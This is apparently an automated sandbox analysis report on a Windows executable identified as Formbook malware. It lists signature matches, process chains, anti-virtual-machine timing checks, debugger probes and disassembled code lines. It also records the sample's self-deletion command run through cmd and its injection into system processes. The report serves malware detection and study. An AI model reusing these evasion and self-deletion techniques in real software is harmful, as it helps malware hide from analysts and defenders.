Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/13
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004041E5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar, 0_2_004020A6
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File created: C:\Users\user\AppData\Local\Temp\nsf9EB.tmp
          Source: TazxfJHRhq.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: TazxfJHRhq.exe | Virustotal: Detection: 14%
          Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File read: C:\Users\user\Desktop\TazxfJHRhq.exe
          Source: unknown | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Unpacked PE file: 1.2.TazxfJHRhq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041C828 push dword ptr [2E33947Ah]; ret 1_2_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004059F2 push es; retf 1_2_004059FC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041C5C7 push dword ptr [2E33947Ah]; ret 1_2_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_0041AE23 push ecx; retf 1_2_0041AE24
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00414F4E pushad ; retf 1_2_00414F51
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00ACD0D1 push ecx; ret 1_2_00ACD0E4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041C828 push dword ptr [2E33947Ah]; ret 1_1_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_004059F2 push es; retf 1_1_004059FC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B3B5 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B46C push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B402 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041B40B push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041C5C7 push dword ptr [2E33947Ah]; ret 1_1_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_1_0041AE23 push ecx; retf 1_1_0041AE24
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0463D0D1 push ecx; ret 4_2_0463D0E4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041C828 push dword ptr [2E33947Ah]; ret 4_2_0041C827
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_004059F2 push es; retf 4_2_004059FC
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B46C push eax; ret 4_2_0041B472
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B402 push eax; ret 4_2_0041B408
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041B40B push eax; ret 4_2_0041B472
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041C5C7 push dword ptr [2E33947Ah]; ret 4_2_0041C827
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_0041AE23 push ecx; retf 4_2_0041AE24
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00414F4E pushad ; retf 4_2_00414F51
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File created: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe | RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 6060 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5400 | Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 0_2_00405301
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 0_2_00405C94
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA, 0_2_004026BC
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.232858915.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.488941796.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.233065923.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.225935087.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.233222059.00000000088C3000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00409B20 LdrLoadDll, 1_2_00409B20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 0_2_73791000
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 0_2_00401FDC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_0267166E mov eax, dword ptr fs:[00000030h] 0_2_0267166E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_02671886 mov eax, dword ptr fs:[00000030h] 0_2_02671886
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h] 1_2_00AB90AF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h] 1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h] 1_2_00A79080
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h] 1_2_00AF3884
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF3884 mov eax, dword ptr fs:[00000030h] 1_2_00AF3884
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h] 1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h] 1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A740E1 mov eax, dword ptr fs:[00000030h] 1_2_00A740E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A758EC mov eax, dword ptr fs:[00000030h] 1_2_00A758EC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B0B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00B0B8D0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h] 1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h] 1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h] 1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8B02A mov eax, dword ptr fs:[00000030h] 1_2_00A8B02A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] 1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] 1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] 1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] 1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA002D mov eax, dword ptr fs:[00000030h] 1_2_00AA002D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h] 1_2_00B44015
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B44015 mov eax, dword ptr fs:[00000030h] 1_2_00B44015
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h] 1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h] 1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF7016 mov eax, dword ptr fs:[00000030h] 1_2_00AF7016
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B32073 mov eax, dword ptr fs:[00000030h] 1_2_00B32073
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B41074 mov eax, dword ptr fs:[00000030h] 1_2_00B41074
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h] 1_2_00A90050
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A90050 mov eax, dword ptr fs:[00000030h] 1_2_00A90050
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF69A6 mov eax, dword ptr fs:[00000030h] 1_2_00AF69A6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA61A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA61A0 mov eax, dword ptr fs:[00000030h] 1_2_00AA61A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h] 1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h] 1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h] 1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AF51BE mov eax, dword ptr fs:[00000030h] 1_2_00AF51BE
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h] 1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h] 1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h] 1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B349A4 mov eax, dword ptr fs:[00000030h] 1_2_00B349A4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9C182 mov eax, dword ptr fs:[00000030h] 1_2_00A9C182
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAA185 mov eax, dword ptr fs:[00000030h] 1_2_00AAA185
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2990 mov eax, dword ptr fs:[00000030h] 1_2_00AA2990
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00A7B1E1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B041E8 mov eax, dword ptr fs:[00000030h] 1_2_00B041E8
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h] 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h] 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h] 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov eax, dword ptr fs:[00000030h] 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A94120 mov ecx, dword ptr fs:[00000030h] 1_2_00A94120
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h] 1_2_00AA513A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA513A mov eax, dword ptr fs:[00000030h] 1_2_00AA513A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h] 1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h] 1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79100 mov eax, dword ptr fs:[00000030h] 1_2_00A79100
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7C962 mov eax, dword ptr fs:[00000030h] 1_2_00A7C962
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h] 1_2_00A7B171
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7B171 mov eax, dword ptr fs:[00000030h] 1_2_00A7B171
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h] 1_2_00A9B944
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9B944 mov eax, dword ptr fs:[00000030h] 1_2_00A9B944
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] 1_2_00A752A5
